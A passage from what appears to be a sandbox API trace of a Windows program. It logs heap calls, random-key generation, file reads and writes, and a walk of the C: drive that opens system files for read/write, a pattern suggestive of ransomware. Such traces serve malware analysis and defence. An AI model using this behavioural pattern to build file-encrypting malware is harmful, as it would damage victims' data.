Size=0x8) returned 0x7d12368 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0087.589] GetProcessHeap () returned 0x4f10000 [0087.589] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.590] GetProcessHeap () returned 0x4f10000 [0087.590] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.591] GetProcessHeap () returned 0x4f10000 [0087.591] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.592] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0087.592] SetFilePointerEx (in: hFile=0xa20, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.592] WriteFile (in: hFile=0xa20, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0087.592] WriteFile (in: hFile=0xa20, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0087.592] GetProcessHeap () returned 0x4f10000 [0087.593] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0087.593] GetProcessHeap () returned 0x4f10000 [0087.593] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0087.593] GetProcessHeap () returned 0x4f10000 [0087.593] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0087.593] CloseHandle (hObject=0xa20) returned 1 [0087.595] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 170 [0087.595] SetFilePointerEx (in: hFile=0xa24, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.595] ReadFile (in: hFile=0xa24, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0087.595] SetFilePointerEx (in: hFile=0xa24, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.595] GetProcessHeap () returned 0x4f10000 [0087.595] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0087.595] GetProcessHeap () returned 0x4f10000 [0087.595] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0087.595] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0087.595] GetProcessHeap () returned 0x4f10000 [0087.595] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0087.595] ReadFile (in: hFile=0xa24, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 Thread: id = 6 os_tid = 0x9a0 Thread: id = 7 os_tid = 0x9a4 Thread: id = 8 os_tid = 0x9a8 Thread: id = 9 os_tid = 0x9ac Thread: id = 23 os_tid = 0x9b8 Thread: id = 95 os_tid = 0xa2c Thread: id = 118 os_tid = 0xb60 [0074.870] GetProcessHeap () returned 0x4f10000 [0074.870] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0074.871] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0074.871] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7cfe928 [0074.871] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0074.871] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="Boot", cAlternateFileName="")) returned 1 [0074.871] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0074.871] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0074.871] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0074.871] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.879] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0074.879] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0074.879] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0074.880] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0074.880] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6eaf6f0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x6eaf6f0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files") returned 20 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)") returned 26 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="Recovery", cAlternateFileName="")) returned 1 [0074.880] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0074.880] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0074.881] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\System Volume Information") returned 32 [0074.881] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="Users", cAlternateFileName="")) returned 1 [0074.881] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0074.881] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x77163ca3, cFileName="Windows", cAlternateFileName="")) returned 1 